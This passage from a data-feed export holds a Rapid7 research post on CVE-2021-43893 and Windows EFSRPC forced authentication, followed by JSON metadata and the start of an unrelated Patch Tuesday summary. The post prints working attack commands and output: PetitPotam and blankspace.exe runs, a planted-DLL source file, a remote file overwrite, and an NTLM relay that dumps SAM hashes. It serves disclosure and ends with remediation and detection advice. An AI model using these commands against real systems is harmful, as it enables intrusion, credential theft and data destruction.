The vulnerability was credited to [James Forshaw](<https://twitter.com/tiraniddo>) of [Google Project Zero](<https://googleprojectzero.blogspot.com/p/about-project-zero.html>), but perhaps owing to the Log4Shell atmosphere, the vulnerability gained little to no attention.\n\nOn January 13, 2022, Forshaw [tweeted](<https://twitter.com/tiraniddo/status/1481633916507209737?s=20&t=P1xWmHiiDap39HipKqbHGg>) about the vulnerability.\n\n\n\nThe tweet suggests that CVE-2021-43893 was only issued a partial fix in the December 2021 update and that authenticated and remote users could still write arbitrary files on domain controllers. James linked to the Project Zero [bug tracker](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2228>), where an extended writeup and some proof-of-concept code was stored.\n\nThis vulnerability was of particular interest to me, because I had recently discovered a local privilege escalation (LPE) using file planting in a Windows product. The vulnerable product could reasonably be deployed on a system with unconstrained delegation, which meant I could use CVE-2021-43893 to remotely plant the file as a low-privileged _remote_ user, turning my LPE into RCE.\n\nI set out to investigate if the remote file-writing aspect of James Forshaw\u2019s bug was truly unpatched. The investigation resulted in a few interesting observations:\n\n * Low-privileged user remote file-writing was patched in the December update. However, before the December update, a remote low-privileged user really could write arbitrary files on system-assigned unconstrained delegation.\n * Forced authentication and relaying are still not completely patched. Relay attacks initiated on the `efsrpc` named pipe have been known since inclusion in [PetitPotam](<https://github.com/topotam/PetitPotam>) in [July 2021](<https://github.com/topotam/PetitPotam/commit/d3a3e0ccbe22432a30509df3551a7766bb89f706>). 
The issue seems to persist despite multiple patch attempts.\n\nAlthough the file upload aspect of this vulnerability has been patched, I found the vulnerability quite interesting. The vulnerability is certainly limited by the restrictions on where a low-privileged user can create files on a Domain Controller, and maybe that is why the vulnerability didn\u2019t receive more attention. But as I touched upon, it can be paired with a local vulnerability to achieve remote code execution, and as such, I thought it deserved more attention. I also have found the failure to properly patch forced authentication over the [EFSRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) protocol to be worthy of more examination.\n\n## Inadequate EFSRPC forced authentication patching: A brief history of PetitPotam\n\nPetitPotam was released in the summer of 2021 and was widely associated with an [attack chain](<https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory>) that starts as an unauthenticated and remote attacker and ends with domain administrator privileges. PetitPotam is **only** the beginning of that chain. It allows an attacker to force a victim Windows computer to authenticate to a third party (e.g. [MITRE ATT&CK T1187 - forced authentication](<https://attack.mitre.org/techniques/T1187/>)). The full chain is interesting, but this discussion is only interested in the initial portion triggered by PetitPotam.\n\nPetitPotam triggers forced authentication using the EFSRPC protocol. The original implementation of the exploit performed the attack over the `lsarpc` named pipe. The attack is quite simple. 
Originally, PetitPotam sent the victim server an [`EfsRpcOpenFileRaw`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/ccc4fb75-1c86-41d7-bbc4-b278ec13bfb8>) request containing a [UNC file path](<https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats>). Using a UNC path such as `\\\\10.0.0.4\\fake_share\\fake_file` forces the victim server to reach out to the third-party server, 10.0.0.4 in this example, in order to read off of the desired file share. The third-party server can then tell the victim to authenticate in order to access the share, and the victim obliges. The result is the victim leaks their Net-NTLM hash. That\u2019s the whole thing. We will later touch on what an attacker can do with this hash, but for this section, that\u2019s all we need to know.\n\nMicrosoft first attempted to patch the EFSRPC forced authentication in August 2021 by blocking the use of `EfsRpcOpenFileRaw` over the `lsarpc` named pipe. To do this, they added logic to `efslsaext.dll`\u2019s `EfsRpcOpenFileRaw_Downlevel` function to check for a value stored at `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EFS\\AllowOpenRawDL`. Because this registry key doesn\u2019t exist by default, a typical configuration will always fail this check.\n\n\n\nThat patch was inadequate, because `EfsRpcOpenFileRaw` isn\u2019t the only EFSRPC function that accepts a UNC file path as a parameter. PetitPotam was quickly [updated](<https://github.com/topotam/PetitPotam/commit/ea66c3f141b1ce3f97865518c87a9b53ebecdb7a>) to use `EfsRpcEncryptFileSrv`, and just like that, the patch was bypassed.\n\nThe patch also failed to recognize that the `lsarpc` named pipe wasn\u2019t the only named pipe that EFSRPC can be executed over. The [`efsrpc`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/403c7ae0-1a3a-4e96-8efc-54e79a2cc451>) named pipe (among others) can also be used. 
The `efsrpc` named pipe is slightly less desirable, since it requires the attacker to be authenticated, but the attack works over that pipe, **and** it doesn\u2019t use the `EfsRpcOpenFileRaw_Downlevel` function. That means an attacker can also bypass the patch by switching named pipes.\n\nAs mentioned earlier, PetitPotam was updated in July 2021 to use the `efsrpc` named pipe. The following output shows PetitPotam forcing a Domain Controller patched through November 2021 to authenticate with an attacker-controlled box running Responder.py (10.0.0.6) (I\u2019ve left out the Responder bit since this is just meant to highlight that EFSRPC was available and unpatched for months).\n \n \n albinolobster@ubuntu:~/impacket/examples$ python3 petitpotam.py -pipe efsr -u 'lowlevel' -p \u2018cheesed00dle!' -d okhuman.ninja 10.0.0.6 10.0.0.5 \n \n \n ___ _ _ _ ___ _ \n | _ \\ ___ | |_ (_) | |_ | _ \\ ___ | |_ __ _ _ __ \n | _/ / -_) | _| | | | _| | _/ / _ \\ | _| / _` | | ' \\ \n _|_|_ \\___| _\\__| _|_|_ _\\__| _|_|_ \\___/ _\\__| \\__,_| |_|_|_| \n _| \"\"\" |_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"|_| \"\"\" |_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"| \n \"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-' \n \n PoC to elicit machine account authentication via some MS-EFSRPC functions\n by topotam (@topotam77)\n \n Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN\n \n \n \n [-] Connecting to ncacn_np:10.0.0.5[\\PIPE\\efsrpc]\n [+] Connected!\n [+] Binding to df1941c5-fe89-4e79-bf10-463657acf44d\n [+] Successfully bound!\n [-] Sending EfsRpcOpenFileRaw!\n [+] Got expected ERROR_BAD_NETPATH exception!!\n [+] Attack worked!\n \n\nNot only did Microsoft fail to patch the issue, but they didn\u2019t issue follow-up patches for months. 
They also haven\u2019t updated their advisory indicating the vulnerability has been exploited in the wild, despite its inclusion in CISA\u2019s [Known Exploited Vulnerability Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n\n\nIn December 2021, Microsoft released a patch for a different EFSRPC vulnerability: [CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>). As part of the remediation for that issue, [Microsoft implemented](<https://support.microsoft.com/en-au/topic/kb5009763-efs-security-hardening-changes-in-cve-2021-43217-719fbc9d-ad9b-4f90-a964-0afe40338002>) some hardening measures on EFSRPC communication. In particular, EFSRPC clients would need to use [`RPC_C_AUTHN_LEVEL_PKT_PRIVACY`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/425a7c53-c33a-4868-8e5b-2a850d40dc73>) when using EFSRPC. If the client fails to do so, then the client is rejected and a Windows application event is generated.\n\n\n\nAt the time of the December patch, PetitPotam didn\u2019t use this specific setting. However, a quick [update](<https://github.com/topotam/PetitPotam/commit/c3accf0875729ffabac13692841e0a671f96d0f2>) allowed the exploit to comply with the new requirement and get back to leaking machine account NTLM hashes of fully patched Windows machines.\n\n## CVE-2021-43893: Windows EFS remote file upload\n\nJames Forshaw\u2019s CVE-2021-43893 dives deeper into the EFSRPC functionality, but the heart of the issue is still a UNC file path problem. PetitPotam\u2019s UNC path pointed to an external server, but CVE-2021-43893 points internally using the UNC path: `\\\\.\\C:\\`. Using a UNC path that points to the victim\u2019s local file system allows attackers to create files and directories on the victim file system.\n\nThere are two major caveats to this vulnerability. First, the file-writing aspect of this vulnerability only appears to work on systems with unconstrained delegation. 
That\u2019s fine if you are only interested in Domain Controllers, but less good if you are only interested in workstations.\n\nSecond, the victim server is impersonating the attacker when the file manipulation occurs. This means a low-privileged attacker can only write to the places where they have permission (e.g. `C:\\ProgramData\\`). Therefore, exploitation resulting in code execution is not a given. Still, while code execution isn\u2019t guaranteed, there are many plausible scenarios that could lead there.\n\n### A plausible scenario leading to RCE using CVE-2021-43893\n\nMy interest in this vulnerability started with a local privilege escalation that I wanted to convert into remote code execution as a higher-privileged user. We can\u2019t yet share the LPE as it\u2019s still unpatched, but we can create a plausible scenario that demonstrates the ability to achieve code execution.\n\nMicrosoft has long maintained that Microsoft services vulnerable to [DLL planting](<https://itm4n.github.io/windows-dll-hijacking-clarified/>) via a world writable `%PATH%` directory are **[won\u2019t-fix](<https://msrc-blog.microsoft.com/2018/04/04/triaging-a-dll-planting-vulnerability/>)** low-security issues \u2014 a weird position given the effort it would take to fix such issues. 
But regardless, exploiting a world-writable `%PATH%` to escalate privileges via a Windows service ([MITRE ATT&CK - Hijack Execution Flow: DLL Search Order Hijacking](<https://attack.mitre.org/techniques/T1574/001/>)) is a useful technique when it\u2019s [available](<https://github.com/rapid7/metasploit-framework/blob/1499b1988e0f6c6cb541e715cf7a3dc43d5563f3/modules/exploits/windows/local/srclient_dll_hijacking.rb>).\n\nThere\u2019s a well-known product that installs itself into a world-writable directory: [Python 2.7](<https://www.python.org/downloads/release/python-2718/>), all the way through its final release 2.7.18.\n \n \n C:\\Users\\administrator>icacls.exe C:\\Python27\\\n C:\\Python27\\ NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)\n BUILTIN\\Administrators:(I)(OI)(CI)(F)\n BUILTIN\\Users:(I)(OI)(CI)(RX)\n BUILTIN\\Users:(I)(CI)(AD)\n BUILTIN\\Users:(I)(CI)(WD)\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\n \n Successfully processed 1 files; Failed processing 0 files\n \n\nThe Python 2.7 installer drops files into `C:\\Python27\\` and provides the user with the following instructions:\n \n \n Besides using the automatically created start menu entry for the Python interpreter, you might want to start Python in the DOS prompt. To make this work, you need to set your %PATH% environment variable to include the directory of your Python distribution, delimited by a semicolon from other entries. An example variable could look like this (assuming the first two entries are Windows\u2019 default):\n \n C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\Python25\n \n Typing python on your command prompt will now fire up the Python interpreter. Thus, you can also execute your scripts with command line options, see Command line documentation.\n \n\nFollowing these instructions, we now have a world-writable directory in `%PATH%` \u2014 which is, of course, the exploitable condition we were looking for. Now we just have to find a Windows service that will search for a missing DLL in `C:\\Python27\\`. 
I quickly accomplished this task by restarting all the running services on a test Windows Server 2019 and watching [procmon](<https://docs.microsoft.com/en-us/sysinternals/downloads/procmon>). I found a number of services will search `C:\\Python27\\` for:\n\n * fveapi.dll\n * cdpsgshims.dll\n\nTo exploit this, we just need to drop a \u201cmalicious\u201d DLL named `fveapi.dll` or `cdpsgshims.dll` in `C:\\Python27`. The DLL will be loaded when a vulnerable service restarts or the server reboots.\n\nFor this simple example, the \u201cmalicious\u201d dll just creates the file `C:\\r7.txt`:\n \n \n #include <Windows.h>\n \n HANDLE hThread;\n DWORD dwThread;\n \n DWORD WINAPI doCreateFile(LPVOID)\n {\n HANDLE createFile = CreateFileW(L\"C:\\\\r7.txt\", GENERIC_WRITE, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);\n CloseHandle(createFile);\n return 0;\n }\n \n BOOL APIENTRY DllMain( HMODULE, DWORD ul_reason_for_call, LPVOID)\n {\n switch (ul_reason_for_call)\n {\n case DLL_PROCESS_ATTACH:\n hThread = CreateThread(NULL, 0, doCreateFile, NULL, 0, &dwThread);\n break;\n case DLL_THREAD_ATTACH:\n case DLL_THREAD_DETACH:\n case DLL_PROCESS_DETACH:\n break;\n }\n return TRUE;\n }\n \n\nAfter compiling the DLL, an attacker can remotely drop the file into `C:\\Python27` using CVE-2021-43893. The following is the output from our [refactored and updated version](<https://github.com/jbaines-r7/blankspace>) of Forshaw\u2019s original proof of concept. 
The attacker is attempting to remotely write the DLL on 10.0.0.6 (vulnerable.okhuman.ninja):\n \n \n C:\\ProgramData>whoami\n okhuman\\lowlevel\n \n C:\\ProgramData>.\\blankspace.exe -r vulnerable.okhuman.ninja -f \\\\.\\C:\\Python27\\fveapi.dll -i ./dll_inject64.dll\n ____ ___ __ ____\n /\\ _`\\ /\\_ \\ /\\ \\ /\\ _`\\\n \\ \\ \\L\\ \\//\\ \\ __ ___\\ \\ \\/'\\ \\ \\,\\L\\_\\ _____ __ ___ __\n \\ \\ _ <'\\ \\ \\ /'__`\\ /' _ `\\ \\ , < \\/_\\__ \\ /\\ '__`\\ /'__`\\ /'___\\ /'__`\\\n \\ \\ \\L\\ \\\\_\\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\ \\ \\\\`\\ /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\.\\_/\\ \\__//\\ __/\n \\ \\____//\\____\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\ \\_\\ \\ `\\____\\ \\ ,__/\\ \\__/.\\_\\ \\____\\ \\____\\\n \\/___/ \\/____/\\/__/\\/_/\\/_/\\/_/\\/_/\\/_/ \\/_____/\\ \\ \\/ \\/__/\\/_/\\/____/\\/____/\n \\ \\_\\\n \\/_/\n [+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja\n [+] Attempting to write to \\\\.\\C:\\Python27\\fveapi.dll\n [+] Encrypt the empty remote file...\n [+] Reading the encrypted remote file object\n [+] Read back 1244 bytes\n [+] Writing 92160 bytes of attacker data to encrypted object::$DATA stream\n [+] Decrypt the the remote file\n [!] Success!\n \n C:\\ProgramData>\n \n\nThe attack yields the desired output, and the file is written to C:\\Python27\\ on the remote target.\n\n\n\nBelow is the Procmon output demonstrating successful code execution as `NT AUTHORITY\\ SYSTEM` when the \u201cDFS Replication\u201d service is restarted. Note that the malicious DLL is loaded and the file \u201cC:\\r7.txt\u201d is created.\n\n\n\nDo many administrators install Python 2.7 on their Domain Controller? I hope not. That wasn\u2019t really the point. 
The point is that exploitation using this technique is plausible and worthy of our collective attention to ensure that it gets patched and monitored for exploitation.\n\n### What can a higher-privileged user do?\n\nOddly, administrators can do anything a low-level user can do except write data to files. When the administrator attempts to write to a file using Forshaw\u2019s ::DATA stream technique, the result is an ACCESS DENIED error. Candidly, I didn\u2019t investigate why.\n\nHowever, it is interesting to note that the administrative user can remotely overwrite all files. This doesn\u2019t serve much purpose from an offensive standpoint, but would serve as an easy, low-effort [wiper](<https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/033/904/original/Talos_WiperWhitepaper.v3.pdf?1525893980>) or data destruction attack. Here is a silly example of remotely overwriting calc.exe from an administrator account.\n \n \n C:\\ProgramData>whoami\n okhuman\\test_admin\n \n C:\\ProgramData>.\\blankspace.exe -r vulnerable.okhuman.ninja -f \\\\.\\C:\\Windows\\System32\\calc.exe -s \"aaaaaaaaaaaa\"\n ____ ___ __ ____\n /\\ _`\\ /\\_ \\ /\\ \\ /\\ _`\\\n \\ \\ \\L\\ \\//\\ \\ __ ___\\ \\ \\/'\\ \\ \\,\\L\\_\\ _____ __ ___ __\n \\ \\ _ <'\\ \\ \\ /'__`\\ /' _ `\\ \\ , < \\/_\\__ \\ /\\ '__`\\ /'__`\\ /'___\\ /'__`\\\n \\ \\ \\L\\ \\\\_\\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\ \\ \\\\`\\ /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\.\\_/\\ \\__//\\ __/\n \\ \\____//\\____\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\ \\_\\ \\ `\\____\\ \\ ,__/\\ \\__/.\\_\\ \\____\\ \\____\\\n \\/___/ \\/____/\\/__/\\/_/\\/_/\\/_/\\/_/\\/_/ \\/_____/\\ \\ \\/ \\/__/\\/_/\\/____/\\/____/\n \\ \\_\\\n \\/_/\n [+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja\n [+] Attempting to write to \\\\.\\C:\\Windows\\System32\\calc.exe\n [+] Encrypt the empty remote file...\n [-] EfsRpcEncryptFileSrv failed with status code: 5\n \n C:\\ProgramData>\n \n\nAs you can see from the output, the tool 
failed with status code 5 (Access Denied). However, `calc.exe` on the remote device was successfully overwritten.\n\n\n\nTechnically speaking, this doesn\u2019t really represent a security boundary being crossed. Administrators typically have access to \\host\\C$ or \\host\\admin$, but the difference in behavior seemed worth mentioning. I\u2019d also note that as of February 2022, administrative users can still do this using `\\\\localhost\\C$\\Windows\\System32\\calc.exe`.\n\nForshaw also mentioned in his original writeup, and I confirmed, that this attack generates the attacking user\u2019s roaming profile on the victim server. That could be a pretty interesting file-upload vector if the Active Directory environment synchronizes roaming directories. Again, I didn\u2019t investigate that any further, but it could be useful in the correct environment.\n\n### Forced authentication still not entirely patched\n\nThe December 2021 patch brought multiple changes to `efslsaext.dll` and resulted in partial mitigation of [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>). One of the changes was the introduction of two new functions: `EfsEnsureLocalPath` and `EfsEnsureLocalHandle`. `EfsEnsureLocalPath` grabs a HANDLE for the attacker-provided file using [CreateFileW](<https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew>). 
The HANDLE is then passed to `EfsEnsureLocalHandle`, which passes the HANDLE to `NtQueryVolumeInformationFile` to validate the characteristics flag doesn\u2019t contain [FILE_REMOTE_DEVICE](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/616b66d5-b335-4e1c-8f87-b4a55e8d3e4a>).\n\n\n\nBecause the patch **still** opens a HANDLE using the attacker-controlled file path, EFSRPC _remains_ vulnerable to forced authentication and relay attacks of the machine account.\n\nDemonstration of the forced authentication and relay does not require the complicated attack often associated with PetitPotam. We just need three boxes:\n\nThe Relay (10.0.0.3): A Linux system running `ntlmrelayx.py`. \nThe Attacker (10.0.0.6): A fully patched Windows 10 system. \nThe Victim (10.0.0.12): A fully patched Windows Server 2019 system.\n\nThe only caveat for this example is that the victim\u2019s machine account (aka [computer account](<https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/service-accounts-computer>)) is assigned to the `Domain Admins` group. Below, you can see the machine account for 10.0.0.12, YEET$, is a member of `Domain Admins`.\n\n\n\nThis may not be a common configuration, but it\u2019s common enough that it\u2019s been the subject of a [couple](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts>) [excellent](<https://pentestlab.blog/2022/02/01/machine-accounts/>) writeups.\n\nThe attack is launched by a low-privileged user on 10.0.0.6 using the `blankspace.exe` proof of concept. 
The attack will force 10.0.0.12 (yeet.okhuman.ninja) to authenticate to the attacker relay at 10.0.0.3.\n \n \n C:\\ProgramData>blankspace.exe -r yeet.okhuman.ninja -f \\\\10.0.0.3\\r7\\r7 --relay\n ____ ___ __ ____\n /\\ _`\\ /\\_ \\ /\\ \\ /\\ _`\\\n \\ \\ \\L\\ \\//\\ \\ __ ___\\ \\ \\/'\\ \\ \\,\\L\\_\\ _____ __ ___ __\n \\ \\ _ <'\\ \\ \\ /'__`\\ /' _ `\\ \\ , < \\/_\\__ \\ /\\ '__`\\ /'__`\\ /'___\\ /'__`\\\n \\ \\ \\L\\ \\\\_\\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\ \\ \\\\`\\ /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\.\\_/\\ \\__//\\ __/\n \\ \\____//\\____\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\ \\_\\ \\ `\\____\\ \\ ,__/\\ \\__/.\\_\\ \\____\\ \\____\\\n \\/___/ \\/____/\\/__/\\/_/\\/_/\\/_/\\/_/\\/_/ \\/_____/\\ \\ \\/ \\/__/\\/_/\\/____/\\/____/\n \\ \\_\\\n \\/_/\n [+] Creating EFS RPC binding handle to yeet.okhuman.ninja\n [+] Sending EfsRpcDecryptFileSrv for \\\\10.0.0.3\\r7\\r7\n [-] EfsRpcDecryptFileSrv failed with status code: 53\n [+] Network path not found error received!\n [!] Success!\n \n C:\\ProgramData>\n \n\nThe Linux relay is running [ntlmrelayx.py](<https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/>) and configured to relay the YEET$ authentication to 10.0.0.6 (the original attacker box). Below, you can see `ntlmrelayx.py` capture the authentication and send it on to 10.0.0.6.\n \n \n albinolobster@ubuntu:~/impacket/examples$ sudo python3 ntlmrelayx.py -debug -t 10.0.0.6 -smb2support \n Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation\n \n [*] SMBD-Thread-4: Connection from OKHUMAN/YEET$@10.0.0.12 controlled, attacking target smb://10.0.0.6\n [*] Authenticating against smb://10.0.0.6 as OKHUMAN/YEET$ SUCCEED\n \n\nThe relay is now authenticated to 10.0.0.6 as `YEET$`, a domain administrator. It can do pretty much as it pleases. 
Below, you can see it dumps the local SAM database.\n \n \n [*] Target system bootKey: 0x9f868ddb4e1dfc56d992aa76ff931df4\n [+] Saving remote SAM database\n [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\n [+] Calculating HashedBootKey from SAM\n [+] NewStyle hashes is: True\n Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6aa01bb4a68e7fd8650cdeb6ad2b63ec:::\n [+] NewStyle hashes is: True\n albinolobster:1000:aad3b435b51404eeaad3b435b51404ee:430ef7587d6ac4410ac8b78dd5cc2bbe:::\n [*] Done dumping SAM hashes for host: 10.0.0.6\n \n\nIt\u2019s as easy as that. All you have to do is find a host with a machine account in the domain admins group:\n \n \n C:\\ProgramData>net group \"domain admins\" /domain\n The request will be processed at a domain controller for domain okhuman.ninja.\n \n Group name Domain Admins\n Comment Designated administrators of the domain\n \n Members\n \n -------------------------------------------------------------------------------\n Administrator test_domain_admin YEET$\n The command completed successfully.\n \n \n C:\\ProgramData>\n \n\nOnce you have that, a low-privileged remote attacker can use EFSRPC to relay and escalate to other machines. However, the attack isn\u2019t exactly silent. On 10.0.0.6, event ID 4624 was created when the 10.0.0.3 relay logged in using the YEET$ machine account.\n\n\n\n## Final thoughts and remediation\n\nWhat began as an investigation into using an unpatched remote file-write vulnerability ended up being a history lesson in EFSRPC patches. 
The remote file-write vulnerability that I originally wanted to use has been patched, but we demonstrated the forced authentication issue hasn\u2019t been adequately fixed. There is no doubt that Windows developers have a tough job. However, a lot of the issues discussed here could have been easily avoided with a reasonable patch in August 2021. The fact that they persist today says a lot about the current state of Windows security.\n\nTo mitigate these issues as best as possible, as always, ensure your systems are successfully updated monthly. Microsoft has released multiple advisories with recommendations regarding NTLM Relay-based attacks (see: [Microsoft Security Advisory 974926 \n](<https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2009/974926>) and [KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>). The most important advice is to ensure SMBv1 no longer exists in your environment and to require SMB signing.\n\nSome other general advice:\n\n * Monitoring for [event ID 4420](<https://support.microsoft.com/en-au/topic/kb5009763-efs-security-hardening-changes-in-cve-2021-43217-719fbc9d-ad9b-4f90-a964-0afe40338002>) in Windows application event logs can help detect EFSRPC-based hacking tools.\n * Monitor for [event ID 4624](<https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624>) in Windows security event logs for remote machine account authentication.\n * Audit machine accounts to ensure they are not members of Domain Admins. 
\n * If possible, audit `%PATH%` of critical systems to ensure no world-writable path exists.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2021-43893 with [authenticated vulnerability checks](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-43893/>) available in the December 15, 2021 content release.\n\nMetasploit Framework users can test their exposure to forced authentication attacks with a new [PetitPotam](<https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/dcerpc/petitpotam.rb>) module available in the 6.1.29 release.\n\n_**Additional reading:**_\n\n * _[PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)_\n * _[Driver-Based Attacks: Past and Present](<https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/>)_\n * _[Open-Source Security: Getting to the Root of the Problem](<https://www.rapid7.com/blog/post/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/>)_\n * _[Ongoing Exploitation of Windows Installer CVE-2021-41379](<https://www.rapid7.com/blog/post/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-14T15:30:52", "type": "rapid7blog", "title": "Dropping Files on a Domain Controller Using CVE-2021-43893", 
"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43217", "CVE-2021-43893", "CVE-2021-44228"], "modified": "2022-02-14T15:30:52", "id": "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "href": "https://blog.rapid7.com/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-10T00:48:57", "description": "\n\nThe second Patch Tuesday of 2021 is relatively light on the vulnerability count, with 64 CVEs being addressed across the majority of Microsoft\u2019s product families. Despite that, there\u2019s still plenty to discuss this month.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 28 \nESU | 14 \nMicrosoft Office | 11 \nBrowser | 9 \nDeveloper Tools | 8 \nMicrosoft Dynamics | 2 \nExchange Server | 2 \nAzure | 2 \nSystem Center | 2 \n \n### Exploited and Publicly Disclosed Vulnerabilities\n\nOne zero-day was announced: [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>) is a privilege elevation vulnerability affecting the Win32k component of Windows 10 and Windows Server 2019, reported to be exploited in the wild. 
Four vulnerabilities have been previously disclosed: [CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>), a privilege elevation vulnerability in Windows Installer, affecting all supported versions of Windows; [CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>), which is a denial of service (DoS) affecting Windows 10 and Server 2019; [CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>), an information disclosure vulnerability affecting DirectX in Windows 10 and Server 2019; and [CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>), an RCE in .NET Core.\n\n### Vulnerabilities in Windows TCP/IP\n\nMicrosoft also disclosed a set of [three serious vulnerabilities](<https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/>) affecting the TCP/IP networking stack in all supported versions of Windows. Two of these ([CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) and [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>)) carry a base CVSSv3 score of 9.8 and could allow Remote Code Execution (RCE). [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) is specific to IPv6 link-local addresses, meaning it isn\u2019t exploitable over the public internet. [CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>), however, does not have this limitation. The third, [CVE-2021-24086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24086>), is a DoS vulnerability that could allow an attacker to trigger a \u201cblue screen of death\u201d on any Windows system that is directly exposed to the internet, using only a small amount of network traffic. 
